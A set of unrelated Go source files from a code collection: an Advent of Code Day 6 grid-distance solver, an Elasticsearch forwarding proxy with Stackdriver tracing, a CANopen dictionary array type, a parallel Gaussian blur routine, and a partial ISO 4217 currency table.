		fmt.Sscanf(in.Text(), "%d, %d", &x, &y)
		coords = append(coords, [2]int{x, y})
		// Register max and min coords
		if x > maxX {
			maxX = x
		}
		if y > maxY {
			maxY = y
		}
		if x < minX {
			minX = x
		}
		if y < minY {
			minY = y
		}
	}
	// votes counts, per coordinate index, how many grid cells are strictly
	// closest to that coordinate.
	votes := map[int]int{}
	// Calculate the area of each point
	for y := minY; y <= maxY; y++ {
		for x := minX; x <= maxX; x++ {
			c := findClosest([2]int{x, y}, coords)
			if y == minY || y == maxY || x == maxX || x == minX {
				// Weight down points that have infinite area: a region
				// touching the bounding box extends forever.
				votes[c] = -1e4
			} else if c == -1 {
				// Ignore draws
				continue
			} else {
				votes[c]++
			}
		}
	}
	// Find the largest area
	max := -1
	for _, v := range votes {
		if v > max {
			max = v
		}
	}
	println(max)
}
// D6C2 - Day 6 Challenge 2
// Input (stdin) is a list of strings in the form of `346, 260`
// Output (stdout) is a single unsigned int: the number of grid cells whose
// summed Manhattan distance to all coordinates stays below 10000.
func D6C2() {
	var coords [][2]int
	// maxD is the exclusive upper bound on the summed distance.
	maxD := int(1e4)
	maxX, maxY, minX, minY := 0, 0, 0, 0
	// Populate coords
	for in := bufio.NewScanner(os.Stdin); in.Scan(); {
		x, y := 0, 0
		fmt.Sscanf(in.Text(), "%d, %d", &x, &y)
		coords = append(coords, [2]int{x, y})
		// Register max and min coords
		if x > maxX {
			maxX = x
		}
		if y > maxY {
			maxY = y
		}
		if x < minX {
			minX = x
		}
		if y < minY {
			minY = y
		}
	}
	votes := 0
	// This assumes that the points are far enough from each other that we don't
	// need to look outside of the [(minX,minY), (maxX,maxY)] rectangles.
	// It should probably include a buffer zone calculated using maxD and the
	// distance between the points that are the farthest from each other on the
	// X or Y axis,
	// Works for me, so I'll spare my CPU the extra loops
	for y := minY; y <= maxY; y++ {
	outer:
		for x := minX; x <= maxX; x++ {
			accumulator := 0
			for _, c := range coords {
				accumulator += manhattanDistance(c, [2]int{x, y})
				if accumulator >= maxD {
					// We don't need to continue calculating
					continue outer
				}
			}
			// This point survived
			votes++
		}
	}
	println(votes)
}
// findClosest returns the index of the coordinate nearest to p by Manhattan
// distance. An exact match returns immediately; when two or more coordinates
// tie for the minimum distance, -1 is returned to signal a draw.
func findClosest(p [2]int, coords [][2]int) int {
	best := -1
	bestDist := math.MaxInt64
	for idx, cand := range coords {
		if cand == p {
			return idx
		}
		dx, dy := cand[0]-p[0], cand[1]-p[1]
		if dx < 0 {
			dx = -dx
		}
		if dy < 0 {
			dy = -dy
		}
		switch d := dx + dy; {
		case d < bestDist:
			// Strictly closer: this candidate takes the lead and clears
			// any earlier draw.
			bestDist = d
			best = idx
		case d == bestDist:
			best = -1
		}
	}
	return best
}
// manhattanDistance returns |X1-X2| + |Y1-Y2|. The arithmetic round-trips
// through float64 to reuse math.Abs and truncates back to int.
func manhattanDistance(p1, p2 [2]int) int {
	return int(math.Abs(float64(p1[0]-p2[0])) + math.Abs(float64(p1[1]-p2[1])))
} | challenges/day6.go | 0.621771 | 0.496765 | day6.go | starcoder |
Pyrios is an Elasticsearch proxy.
Pyrios forwards the HTTP request from a client to the on prem ElasticSearch cluster
and sends the response back to the client.
The in-cluster application can access the pyrios API endpoint via the `pyrios` service.
*/
package main
import (
"cloud.google.com/go/compute/metadata"
"context"
"contrib.go.opencensus.io/exporter/stackdriver"
"fmt"
"go.opencensus.io/trace"
"io"
"log"
"net/http"
"os"
)
// Sets the default server IP and port for ElasticSearch server
const (
defaultESServer = "127.0.0.1"
defaultESPort = 9200
)
/*
handleHTTP is our main HTTP handler.

It takes the IP address of the on prem elasticsearch endpoint in our demo
(the regional static IP address exposed by the internal load balancer of
the on premise cluster's elastic-client service), forwards the client's
request to that endpoint, then copies the response back to the client.
*/
func handleHTTP(esServer string, w http.ResponseWriter, r *http.Request) {
	ep := *r.URL
	path := ep.Path
	ep.Host = fmt.Sprintf("%s:%d", esServer, defaultESPort)
	ep.Scheme = "http"
	startOptions := trace.WithSampler(trace.AlwaysSample())
	_, span := trace.StartSpan(r.Context(), path, startOptions)
	defer span.End()
	// Rewrite the request with the elasticsearch endpoint.
	req, err := http.NewRequest(r.Method, ep.String(), r.Body)
	if err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		log.Printf("error creating new request encountered: %v ", err)
		return
	}
	// Enforce the Content-Type for working with ES 6.x and up.
	// https://www.elastic.co/blog/strict-content-type-checking-for-elasticsearch-rest-requests
	req.Header.Set("Content-Type", "application/json")
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		log.Printf("error sending request to the on prem elasticsearch cluster encountered: %v ", err)
		return
	}
	// Register the close immediately after the error check so it runs on
	// every path that has a body to close.
	defer resp.Body.Close()
	// Copy the response headers BEFORE calling WriteHeader: headers set
	// after WriteHeader are silently ignored. Also propagate the upstream
	// status code instead of unconditionally reporting 200 OK as before.
	copyHeader(w.Header(), resp.Header)
	w.WriteHeader(resp.StatusCode)
	io.Copy(w, resp.Body)
	log.Print("Pyrios proxy request handled successfully")
}
// Helper func copies http headers from src to dst.
// It returns nothing, dst is changed and returned as a copy of src.
func copyHeader(dst, src http.Header) {
for k, vv := range src {
for _, v := range vv {
dst.Add(k, v)
}
}
}
// Our main entry function: reads the relevant environment variables
// (GCP_PROJECT, ES_SERVER), wires up Stackdriver trace exporting, and
// serves the proxy handler on the ElasticSearch port.
func main() {
	gcpProject := os.Getenv("GCP_PROJECT")
	var err error
	if gcpProject == "" {
		// Not configured explicitly: ask the GCE/GKE metadata server.
		metadataClient := metadata.NewClient(http.DefaultClient)
		if metadataClient == nil {
			log.Fatal("Metadata client failed to create")
		}
		gcpProject, err = metadataClient.ProjectID()
		if err != nil {
			log.Fatal("Cannot determine GCP project")
		}
	}
	// Here we decide where to export our OpenCensus data.
	exporter, err := stackdriver.NewExporter(
		stackdriver.Options{
			ProjectID: gcpProject,
		})
	if err != nil {
		log.Fatal("Failed to create Stackdriver trace exporter")
	}
	trace.RegisterExporter(exporter)
	// Here we read ES_SERVER from the environment or use a default value.
	esServer := os.Getenv("ES_SERVER")
	if esServer == "" {
		log.Print(fmt.Sprintf("ES_SERVER is not set, using default value of %s", defaultESServer))
		esServer = defaultESServer
	}
	// Set up the HTTP server with a http handler.
	// https://godoc.org/net/http Custom Server.
	s := &http.Server{
		Addr: fmt.Sprintf(":%d", defaultESPort),
		Handler: http.HandlerFunc(
			func(w http.ResponseWriter, r *http.Request) {
				handleHTTP(esServer, w, r)
			})}
	defer s.Shutdown(context.Background())
	log.Print("Starting pyrios proxy")
	s.ListenAndServe()
} | pyrios/main.go | 0.69451 | 0.411939 | main.go | starcoder |
package canopen
// DicArray is an object-dictionary entry of array type: a 16-bit index
// grouping a set of sub-indexed member objects.
type DicArray struct {
	Description string
	Index uint16
	Name string
	SDOClient *SDOClient
	// SubIndexes maps a member's sub-index to the member itself.
	SubIndexes map[uint8]DicObject
	// SubNames maps a member's name to its sub-index.
	SubNames map[string]uint8
}
// GetIndex returns the object-dictionary index of the array.
func (array *DicArray) GetIndex() uint16 {
	return array.Index
}
// GetSubIndex returns 0: the array itself carries no sub-index of its own.
func (array *DicArray) GetSubIndex() uint8 { return 0 }
// GetName returns the human-readable name of the array.
func (array *DicArray) GetName() string {
	return array.Name
}
// AddMember registers object under both its sub-index and its name,
// lazily allocating the lookup maps on first use.
func (array *DicArray) AddMember(object DicObject) {
	if array.SubIndexes == nil {
		array.SubIndexes = make(map[uint8]DicObject)
	}
	if array.SubNames == nil {
		array.SubNames = make(map[string]uint8)
	}
	sub := object.GetSubIndex()
	array.SubIndexes[sub] = object
	array.SubNames[object.GetName()] = sub
}
// FindIndex looks up a member by sub-index and, when found, attaches the
// array's SDO client to it before returning it; it returns nil when absent.
// NOTE(review): the uint16 parameter is truncated to uint8 for the map
// lookup, so values >= 256 alias into the 0-255 range — confirm callers
// never pass indexes that wide.
func (array *DicArray) FindIndex(index uint16) DicObject {
	if object, ok := array.SubIndexes[uint8(index)]; ok {
		object.SetSDO(array.SDOClient)
		return object
	}
	return nil
}
// FindName resolves a member name to its sub-index and delegates to
// FindIndex; it returns nil when the name is unknown.
func (array *DicArray) FindName(name string) DicObject {
	index, ok := array.SubNames[name]
	if !ok {
		return nil
	}
	return array.FindIndex(uint16(index))
}
// The accessors and mutators below are no-op stubs: a DicArray is a
// container rather than a value-carrying entry, so the value-oriented
// getters return zero values and the setters discard their arguments.
// Presumably they exist only to satisfy the shared DicObject interface —
// confirm against its definition.
func (array *DicArray) GetDataType() byte { return 0x00 }
func (array *DicArray) GetDataLen() int { return 0 }
func (array *DicArray) SetSize(s int) {}
func (array *DicArray) SetOffset(s int) {}
func (array *DicArray) GetOffset() int { return 0 }
func (array *DicArray) Read() error { return nil }
func (array *DicArray) Save() error { return nil }
func (array *DicArray) GetData() []byte { return nil }
func (array *DicArray) SetData(data []byte) {}
func (array *DicArray) GetStringVal() *string { return nil }
func (array *DicArray) GetFloatVal() *float64 { return nil }
func (array *DicArray) GetUintVal() *uint64 { return nil }
func (array *DicArray) GetIntVal() *int64 { return nil }
func (array *DicArray) GetBoolVal() *bool { return nil }
func (array *DicArray) GetByteVal() *byte { return nil }
func (array *DicArray) SetStringVal(a string) {}
func (array *DicArray) SetFloatVal(a float64) {}
func (array *DicArray) SetUintVal(a uint64) {}
func (array *DicArray) SetIntVal(a int64) {}
func (array *DicArray) SetBoolVal(a bool) {}
func (array *DicArray) SetByteVal(a byte) {}
func (array *DicArray) IsDicVariable() bool { return false }
// SetSDO stores the SDO client that FindIndex attaches to returned members.
func (array *DicArray) SetSDO(sdo *SDOClient) {
	array.SDOClient = sdo
} | dic_array.go | 0.625324 | 0.450359 | dic_array.go | starcoder |
package song2
// https://www.youtube.com/watch?v=SSbBvKaM6sk
import (
"image"
"image/color"
"image/draw"
"math"
"runtime"
"sync"
)
// GaussianBlur approximates a Gaussian blur of src with standard deviation r
// by running three successive box-blur passes whose widths come from
// BoxesForGauss. The result is returned as a new *image.RGBA; src itself is
// left untouched (both working buffers are copies).
func GaussianBlur(src image.Image, r float64) *image.RGBA {
	clone := CloneToRGBA(src)
	dst := CloneToRGBA(src)
	bxs := BoxesForGauss(r, 3)
	for _, b := range bxs {
		// (b-1)/2 converts an (odd) box width into a radius.
		boxBlur(clone, dst, (b-1)/2)
	}
	return dst
}
type Direction int
const (
dirX Direction = iota
dirY
)
// boxBlur performs one full box blur of radius r as two separable 1-D
// passes. Note the argument swap on the calls below: the horizontal pass
// reads dst and writes src, then the vertical pass reads src and writes
// dst — so dst ends up holding the blurred result while src serves as
// scratch space.
func boxBlur(src, dst *image.RGBA, r int) {
	height := src.Bounds().Max.Y - src.Bounds().Min.Y
	width := src.Bounds().Max.X - src.Bounds().Min.X
	boxBlurParallel(dirX, height, dst, src, r)
	boxBlurParallel(dirY, width, src, dst, r)
}
// boxBlurParallel splits the rows (dirX) or columns (dirY) of the image
// into roughly NumCPU contiguous chunks and blurs each chunk in its own
// goroutine, waiting for all of them to finish before returning.
func boxBlurParallel(d Direction, length int, src, dst *image.RGBA, r int) {
	procs := runtime.NumCPU()
	ps := length / procs
	if ps == 0 {
		// With fewer rows/columns than CPUs the chunk size truncated to 0,
		// which previously made the loop below spin forever (length was
		// never decremented). Fall back to one-line chunks.
		ps = 1
	}
	var wg sync.WaitGroup
	for length > 0 {
		// Each chunk covers [start, end) measured from the low edge; start
		// and end are fresh variables per iteration, so the closure below
		// captures them safely.
		start := length - ps
		if start < 0 {
			start = 0
		}
		end := length
		length -= ps
		wg.Add(1)
		go func() {
			defer wg.Done()
			switch d {
			case dirX:
				BoxBlurHorizontal(src, dst, src.Bounds().Min.Y+start, src.Bounds().Min.Y+end, r)
			case dirY:
				BoxBlurTotal(src, dst, src.Bounds().Min.X+start, src.Bounds().Min.X+end, r)
			}
		}()
	}
	wg.Wait()
}
// BoxBlurHorizontal box-blurs rows start..end-1 of src into dst using a
// per-row sliding-window sum of radius r for each RGBA channel (O(width)
// work per row instead of O(width*r)). Pixels past the row edges are
// treated as copies of the first/last pixel of the row.
// NOTE(review): the loop bounds below use Bounds().Max.X directly as a
// count, which assumes src.Bounds().Min.X == 0 — confirm callers only pass
// images with a zero origin (image.NewRGBA-style bounds).
func BoxBlurHorizontal(src, dst *image.RGBA, start, end, r int) {
	fr := float64(r)
	iarr := 1.0 / (fr + fr + 1.0)
	for i := start; i < end; i++ {
		ti := src.Bounds().Min.X
		li := ti
		ri := ti + r
		fvpos := src.PixOffset(ti, i)
		lvpos := src.PixOffset(src.Bounds().Max.X-1, i)
		fvr := int(src.Pix[fvpos+0])
		fvg := int(src.Pix[fvpos+1])
		fvb := int(src.Pix[fvpos+2])
		fva := int(src.Pix[fvpos+3])
		// Seed the window sum as if the first pixel extended r+1 cells
		// to the left, then add the first r real pixels.
		val_r := fvr * (r + 1)
		val_g := fvg * (r + 1)
		val_b := fvb * (r + 1)
		val_a := fva * (r + 1)
		for j := 0; j < r; j++ {
			pos := src.PixOffset(ti+j, i)
			val_r += int(src.Pix[pos+0])
			val_g += int(src.Pix[pos+1])
			val_b += int(src.Pix[pos+2])
			val_a += int(src.Pix[pos+3])
		}
		// Leading edge: slide in real pixels while sliding out copies of
		// the first pixel.
		for j := 0; j <= r; j++ {
			pos := src.PixOffset(ri, i)
			ri++
			val_r += int(src.Pix[pos+0]) - fvr
			val_g += int(src.Pix[pos+1]) - fvg
			val_b += int(src.Pix[pos+2]) - fvb
			val_a += int(src.Pix[pos+3]) - fva
			_r := uint8(math.Round(float64(val_r) * iarr))
			_g := uint8(math.Round(float64(val_g) * iarr))
			_b := uint8(math.Round(float64(val_b) * iarr))
			_a := uint8(math.Round(float64(val_a) * iarr))
			dst.SetRGBA(ti, i, color.RGBA{_r, _g, _b, _a})
			ti++
		}
		// Middle: both window edges are inside the row.
		for j := r + 1; j < src.Bounds().Max.X-r; j++ {
			ripos := src.PixOffset(ri, i)
			ri++
			lipos := src.PixOffset(li, i)
			li++
			val_r += int(src.Pix[ripos+0]) - int(src.Pix[lipos+0])
			val_g += int(src.Pix[ripos+1]) - int(src.Pix[lipos+1])
			val_b += int(src.Pix[ripos+2]) - int(src.Pix[lipos+2])
			val_a += int(src.Pix[ripos+3]) - int(src.Pix[lipos+3])
			_r := uint8(math.Round(float64(val_r) * iarr))
			_g := uint8(math.Round(float64(val_g) * iarr))
			_b := uint8(math.Round(float64(val_b) * iarr))
			_a := uint8(math.Round(float64(val_a) * iarr))
			dst.SetRGBA(ti, i, color.RGBA{_r, _g, _b, _a})
			ti++
		}
		// Trailing edge: slide in copies of the last pixel.
		for j := src.Bounds().Max.X - r; j < src.Bounds().Max.X; j++ {
			pos := src.PixOffset(li, i)
			li++
			val_r += int(src.Pix[lvpos+0]) - int(src.Pix[pos+0])
			val_g += int(src.Pix[lvpos+1]) - int(src.Pix[pos+1])
			val_b += int(src.Pix[lvpos+2]) - int(src.Pix[pos+2])
			val_a += int(src.Pix[lvpos+3]) - int(src.Pix[pos+3])
			_r := uint8(math.Round(float64(val_r) * iarr))
			_g := uint8(math.Round(float64(val_g) * iarr))
			_b := uint8(math.Round(float64(val_b) * iarr))
			_a := uint8(math.Round(float64(val_a) * iarr))
			dst.SetRGBA(ti, i, color.RGBA{_r, _g, _b, _a})
			ti++
		}
	}
}
// BoxBlurTotal is the vertical counterpart of BoxBlurHorizontal: it
// box-blurs columns start..end-1 of src into dst with the same radius-r
// sliding-window technique, clamping to the first/last pixel of each
// column at the edges.
// NOTE(review): as in BoxBlurHorizontal, the loop bounds use Bounds().Max.Y
// directly and assume src.Bounds().Min.Y == 0 — confirm at the call sites.
func BoxBlurTotal(src, dst *image.RGBA, start, end, r int) {
	fr := float64(r)
	iarr := 1.0 / (fr + fr + 1.0)
	for i := start; i < end; i++ {
		ti := src.Bounds().Min.Y
		li := ti
		ri := ti + r
		fvpos := src.PixOffset(i, ti)
		lvpos := src.PixOffset(i, src.Bounds().Max.Y-1)
		fvr := int(src.Pix[fvpos+0])
		fvg := int(src.Pix[fvpos+1])
		fvb := int(src.Pix[fvpos+2])
		fva := int(src.Pix[fvpos+3])
		// Seed the window sum as if the top pixel extended r+1 cells
		// upward, then add the first r real pixels.
		val_r := fvr * (r + 1)
		val_g := fvg * (r + 1)
		val_b := fvb * (r + 1)
		val_a := fva * (r + 1)
		for j := 0; j < r; j++ {
			pos := src.PixOffset(i, ti+j)
			val_r += int(src.Pix[pos+0])
			val_g += int(src.Pix[pos+1])
			val_b += int(src.Pix[pos+2])
			val_a += int(src.Pix[pos+3])
		}
		// Leading edge: slide in real pixels while sliding out copies of
		// the top pixel.
		for j := 0; j <= r; j++ {
			pos := src.PixOffset(i, ri)
			ri++
			val_r += int(src.Pix[pos+0]) - fvr
			val_g += int(src.Pix[pos+1]) - fvg
			val_b += int(src.Pix[pos+2]) - fvb
			val_a += int(src.Pix[pos+3]) - fva
			_r := uint8(math.Round(float64(val_r) * iarr))
			_g := uint8(math.Round(float64(val_g) * iarr))
			_b := uint8(math.Round(float64(val_b) * iarr))
			_a := uint8(math.Round(float64(val_a) * iarr))
			dst.SetRGBA(i, ti, color.RGBA{_r, _g, _b, _a})
			ti++
		}
		// Middle: both window edges are inside the column.
		for j := r + 1; j < src.Bounds().Max.Y-r; j++ {
			ripos := src.PixOffset(i, ri)
			ri++
			lipos := src.PixOffset(i, li)
			li++
			val_r += int(src.Pix[ripos+0]) - int(src.Pix[lipos+0])
			val_g += int(src.Pix[ripos+1]) - int(src.Pix[lipos+1])
			val_b += int(src.Pix[ripos+2]) - int(src.Pix[lipos+2])
			val_a += int(src.Pix[ripos+3]) - int(src.Pix[lipos+3])
			_r := uint8(math.Round(float64(val_r) * iarr))
			_g := uint8(math.Round(float64(val_g) * iarr))
			_b := uint8(math.Round(float64(val_b) * iarr))
			_a := uint8(math.Round(float64(val_a) * iarr))
			dst.SetRGBA(i, ti, color.RGBA{_r, _g, _b, _a})
			ti++
		}
		// Trailing edge: slide in copies of the bottom pixel.
		for j := src.Bounds().Max.Y - r; j < src.Bounds().Max.Y; j++ {
			pos := src.PixOffset(i, li)
			li++
			val_r += int(src.Pix[lvpos+0]) - int(src.Pix[pos+0])
			val_g += int(src.Pix[lvpos+1]) - int(src.Pix[pos+1])
			val_b += int(src.Pix[lvpos+2]) - int(src.Pix[pos+2])
			val_a += int(src.Pix[lvpos+3]) - int(src.Pix[pos+3])
			_r := uint8(math.Round(float64(val_r) * iarr))
			_g := uint8(math.Round(float64(val_g) * iarr))
			_b := uint8(math.Round(float64(val_b) * iarr))
			_a := uint8(math.Round(float64(val_a) * iarr))
			dst.SetRGBA(i, ti, color.RGBA{_r, _g, _b, _a})
			ti++
		}
	}
}
// BoxesForGauss computes the widths of n box filters that, applied in
// sequence, approximate a Gaussian blur with the given standard deviation.
// The first few boxes use a smaller odd width and the rest the next odd
// width up, so that the combined variance matches the target sigma.
func BoxesForGauss(sigma float64, n int) []int { // standard deviation, number of boxes
	// Ideal averaging-filter width, and the nearest odd integer at or
	// below it.
	ideal := math.Sqrt(12.0*sigma*sigma/float64(n) + 1.0)
	lower := int(math.Floor(ideal))
	if lower%2 == 0 {
		lower--
	}
	upper := lower + 2
	// Number of leading passes that should use the smaller width.
	cutoff := math.Round((12.0*sigma*sigma - float64(n*lower*lower+4*n*lower+3*n)) / float64(-4*lower-4))
	sizes := make([]int, n)
	for i := range sizes {
		sizes[i] = upper
		if float64(i) < cutoff {
			sizes[i] = lower
		}
	}
	return sizes
}
// CloneToRGBA copies src into a freshly allocated *image.RGBA with the same
// bounds, converting pixel formats as needed via draw.Draw.
func CloneToRGBA(src image.Image) *image.RGBA {
	b := src.Bounds()
	dst := image.NewRGBA(b)
	draw.Draw(dst, b, src, b.Min, draw.Src)
	return dst
} | song2.go | 0.532911 | 0.438064 | song2.go | starcoder |
package currency
var (
	// byNumeric and byISO index every registered Currency by its numeric
	// code and its alphabetic ISO 4217 code respectively; both tables
	// share the same *Currency values (see add).
	byNumeric = map[string]*Currency{}
	byISO = map[string]*Currency{}
	// Testing currency
	// For testing purposes this currency should have 2 decimal digits
	// just like other major currencies
	xts = Currency{
		Numeric: "963",
		ISO: "XTS",
		Decimals: 2,
		Name: "Testing currency",
	}
)
// add registers c in both package-level lookup tables, keyed by its numeric
// code and by its ISO alphabetic code; both entries share one *Currency.
func add(c Currency) {
	ref := &c
	byNumeric[c.Numeric] = ref
	byISO[c.ISO] = ref
}
func init() {
Add(
Currency{Numeric: "008", ISO: "ALL", Decimals: 2, Name: "Lek"},
Currency{Numeric: "012", ISO: "DZD", Decimals: 2, Name: "Algerian Dinar"},
Currency{Numeric: "032", ISO: "ARS", Decimals: 2, Name: "Argentine Peso"},
Currency{Numeric: "036", ISO: "AUD", Decimals: 2, Name: "Australian Dollar"},
Currency{Numeric: "044", ISO: "BSD", Decimals: 2, Name: "Bahamian Dollar"},
Currency{Numeric: "048", ISO: "BHD", Decimals: 3, Name: "Bahraini Dinar"},
Currency{Numeric: "050", ISO: "BDT", Decimals: 2, Name: "Taka"},
Currency{Numeric: "051", ISO: "AMD", Decimals: 2, Name: "Armenian Dram"},
Currency{Numeric: "052", ISO: "BBD", Decimals: 2, Name: "Barbados Dollar"},
Currency{Numeric: "060", ISO: "BMD", Decimals: 2, Name: "Bermudian Dollar"},
Currency{Numeric: "064", ISO: "BTN", Decimals: 2, Name: "Ngultrum"},
Currency{Numeric: "068", ISO: "BOB", Decimals: 2, Name: "Boliviano"},
Currency{Numeric: "072", ISO: "BWP", Decimals: 2, Name: "Pula"},
Currency{Numeric: "084", ISO: "BZD", Decimals: 2, Name: "Belize Dollar"},
Currency{Numeric: "090", ISO: "SBD", Decimals: 2, Name: "Solomon Islands Dollar"},
Currency{Numeric: "096", ISO: "BND", Decimals: 2, Name: "Brunei Dollar"},
Currency{Numeric: "104", ISO: "MMK", Decimals: 2, Name: "Kyat"},
Currency{Numeric: "108", ISO: "BIF", Decimals: 0, Name: "Burundi Franc"},
Currency{Numeric: "116", ISO: "KHR", Decimals: 2, Name: "Riel"},
Currency{Numeric: "124", ISO: "CAD", Decimals: 2, Name: "Canadian Dollar"},
Currency{Numeric: "132", ISO: "CVE", Decimals: 2, Name: "<NAME>"},
Currency{Numeric: "136", ISO: "KYD", Decimals: 2, Name: "Cayman Islands Dollar"},
Currency{Numeric: "144", ISO: "LKR", Decimals: 2, Name: "Sri Lanka Rupee"},
Currency{Numeric: "152", ISO: "CLP", Decimals: 0, Name: "Chilean Peso"},
Currency{Numeric: "156", ISO: "CNY", Decimals: 2, Name: "<NAME>"},
Currency{Numeric: "170", ISO: "COP", Decimals: 2, Name: "Colombian Peso"},
Currency{Numeric: "174", ISO: "KMF", Decimals: 0, Name: "Comorian Franc "},
Currency{Numeric: "188", ISO: "CRC", Decimals: 2, Name: "Costa Rican Colon"},
Currency{Numeric: "191", ISO: "HRK", Decimals: 2, Name: "Kuna"},
Currency{Numeric: "192", ISO: "CUP", Decimals: 2, Name: "Cuban Peso"},
Currency{Numeric: "203", ISO: "CZK", Decimals: 2, Name: "Czech Koruna"},
Currency{Numeric: "208", ISO: "DKK", Decimals: 2, Name: "Danish Krone"},
Currency{Numeric: "214", ISO: "DOP", Decimals: 2, Name: "Dominican Peso"},
Currency{Numeric: "222", ISO: "SVC", Decimals: 2, Name: "El Salvador Colon"},
Currency{Numeric: "230", ISO: "ETB", Decimals: 2, Name: "Ethiopian Birr"},
Currency{Numeric: "232", ISO: "ERN", Decimals: 2, Name: "Nakfa"},
Currency{Numeric: "238", ISO: "FKP", Decimals: 2, Name: "Falkland Islands Pound"},
Currency{Numeric: "242", ISO: "FJD", Decimals: 2, Name: "Fiji Dollar"},
Currency{Numeric: "262", ISO: "DJF", Decimals: 0, Name: "Djibouti Franc"},
Currency{Numeric: "270", ISO: "GMD", Decimals: 2, Name: "Dalasi"},
Currency{Numeric: "292", ISO: "GIP", Decimals: 2, Name: "Gibraltar Pound"},
Currency{Numeric: "320", ISO: "GTQ", Decimals: 2, Name: "Quetzal"},
Currency{Numeric: "324", ISO: "GNF", Decimals: 0, Name: "Guinean Franc"},
Currency{Numeric: "328", ISO: "GYD", Decimals: 2, Name: "Guyana Dollar"},
Currency{Numeric: "332", ISO: "HTG", Decimals: 2, Name: "Gourde"},
Currency{Numeric: "340", ISO: "HNL", Decimals: 2, Name: "Lempira"},
Currency{Numeric: "344", ISO: "HKD", Decimals: 2, Name: "Hong Kong Dollar"},
Currency{Numeric: "348", ISO: "HUF", Decimals: 2, Name: "Forint"},
Currency{Numeric: "352", ISO: "ISK", Decimals: 0, Name: "Iceland Krona"},
Currency{Numeric: "356", ISO: "INR", Decimals: 2, Name: "Indian Rupee"},
Currency{Numeric: "360", ISO: "IDR", Decimals: 2, Name: "Rupiah"},
Currency{Numeric: "364", ISO: "IRR", Decimals: 2, Name: "Iranian Rial"},
Currency{Numeric: "368", ISO: "IQD", Decimals: 3, Name: "Iraqi Dinar"},
Currency{Numeric: "376", ISO: "ILS", Decimals: 2, Name: "New Israeli Sheqel"},
Currency{Numeric: "388", ISO: "JMD", Decimals: 2, Name: "Jamaican Dollar"},
Currency{Numeric: "392", ISO: "JPY", Decimals: 0, Name: "Yen"},
Currency{Numeric: "398", ISO: "KZT", Decimals: 2, Name: "Tenge"},
Currency{Numeric: "400", ISO: "JOD", Decimals: 3, Name: "Jordanian Dinar"},
Currency{Numeric: "404", ISO: "KES", Decimals: 2, Name: "Kenyan Shilling"},
Currency{Numeric: "408", ISO: "KPW", Decimals: 2, Name: "North Korean Won"},
Currency{Numeric: "410", ISO: "KRW", Decimals: 0, Name: "Won"},
Currency{Numeric: "414", ISO: "KWD", Decimals: 3, Name: "Kuwaiti Dinar"},
Currency{Numeric: "417", ISO: "KGS", Decimals: 2, Name: "Som"},
Currency{Numeric: "418", ISO: "LAK", Decimals: 2, Name: "Lao Kip"},
Currency{Numeric: "422", ISO: "LBP", Decimals: 2, Name: "Lebanese Pound"},
Currency{Numeric: "426", ISO: "LSL", Decimals: 2, Name: "Loti"},
Currency{Numeric: "430", ISO: "LRD", Decimals: 2, Name: "Liberian Dollar"},
Currency{Numeric: "434", ISO: "LYD", Decimals: 3, Name: "Libyan Dinar"},
Currency{Numeric: "446", ISO: "MOP", Decimals: 2, Name: "Pataca"},
Currency{Numeric: "454", ISO: "MWK", Decimals: 2, Name: "Malawi Kwacha"},
Currency{Numeric: "458", ISO: "MYR", Decimals: 2, Name: "Malaysian Ringgit"},
Currency{Numeric: "462", ISO: "MVR", Decimals: 2, Name: "Rufiyaa"},
Currency{Numeric: "480", ISO: "MUR", Decimals: 2, Name: "Mauritius Rupee"},
Currency{Numeric: "484", ISO: "MXN", Decimals: 2, Name: "Mexican Peso"},
Currency{Numeric: "496", ISO: "MNT", Decimals: 2, Name: "Tugrik"},
Currency{Numeric: "498", ISO: "MDL", Decimals: 2, Name: "Moldovan Leu"},
Currency{Numeric: "504", ISO: "MAD", Decimals: 2, Name: "Moroccan Dirham"},
Currency{Numeric: "512", ISO: "OMR", Decimals: 3, Name: "<NAME>"},
Currency{Numeric: "516", ISO: "NAD", Decimals: 2, Name: "Namibia Dollar"},
Currency{Numeric: "524", ISO: "NPR", Decimals: 2, Name: "Nepalese Rupee"},
Currency{Numeric: "532", ISO: "ANG", Decimals: 2, Name: "Netherlands Antillean Guilder"},
Currency{Numeric: "533", ISO: "AWG", Decimals: 2, Name: "Aruban Florin"},
Currency{Numeric: "548", ISO: "VUV", Decimals: 0, Name: "Vatu"},
Currency{Numeric: "554", ISO: "NZD", Decimals: 2, Name: "New Zealand Dollar"},
Currency{Numeric: "558", ISO: "NIO", Decimals: 2, Name: "Cordoba Oro"},
Currency{Numeric: "566", ISO: "NGN", Decimals: 2, Name: "Naira"},
Currency{Numeric: "578", ISO: "NOK", Decimals: 2, Name: "Norwegian Krone"},
Currency{Numeric: "586", ISO: "PKR", Decimals: 2, Name: "Pakistan Rupee"},
Currency{Numeric: "590", ISO: "PAB", Decimals: 2, Name: "Balboa"},
Currency{Numeric: "598", ISO: "PGK", Decimals: 2, Name: "Kina"},
Currency{Numeric: "600", ISO: "PYG", Decimals: 0, Name: "Guarani"},
Currency{Numeric: "604", ISO: "PEN", Decimals: 2, Name: "Sol"},
Currency{Numeric: "608", ISO: "PHP", Decimals: 2, Name: "Philippine Peso"},
Currency{Numeric: "634", ISO: "QAR", Decimals: 2, Name: "Qatari Rial"},
Currency{Numeric: "643", ISO: "RUB", Decimals: 2, Name: "Russian Ruble"},
Currency{Numeric: "646", ISO: "RWF", Decimals: 0, Name: "Rwanda Franc"},
Currency{Numeric: "654", ISO: "SHP", Decimals: 2, Name: "Saint Helena Pound"},
Currency{Numeric: "682", ISO: "SAR", Decimals: 2, Name: "Saudi Riyal"},
Currency{Numeric: "690", ISO: "SCR", Decimals: 2, Name: "Seychelles Rupee"},
Currency{Numeric: "694", ISO: "SLL", Decimals: 2, Name: "Leone"},
Currency{Numeric: "702", ISO: "SGD", Decimals: 2, Name: "Singapore Dollar"},
Currency{Numeric: "704", ISO: "VND", Decimals: 0, Name: "Dong"},
Currency{Numeric: "706", ISO: "SOS", Decimals: 2, Name: "Somali Shilling"},
Currency{Numeric: "710", ISO: "ZAR", Decimals: 2, Name: "Rand"},
Currency{Numeric: "728", ISO: "SSP", Decimals: 2, Name: "South Sudanese Pound"},
Currency{Numeric: "748", ISO: "SZL", Decimals: 2, Name: "Lilangeni"},
Currency{Numeric: "752", ISO: "SEK", Decimals: 2, Name: "Swedish Krona"},
Currency{Numeric: "756", ISO: "CHF", Decimals: 2, Name: "Swiss Franc"},
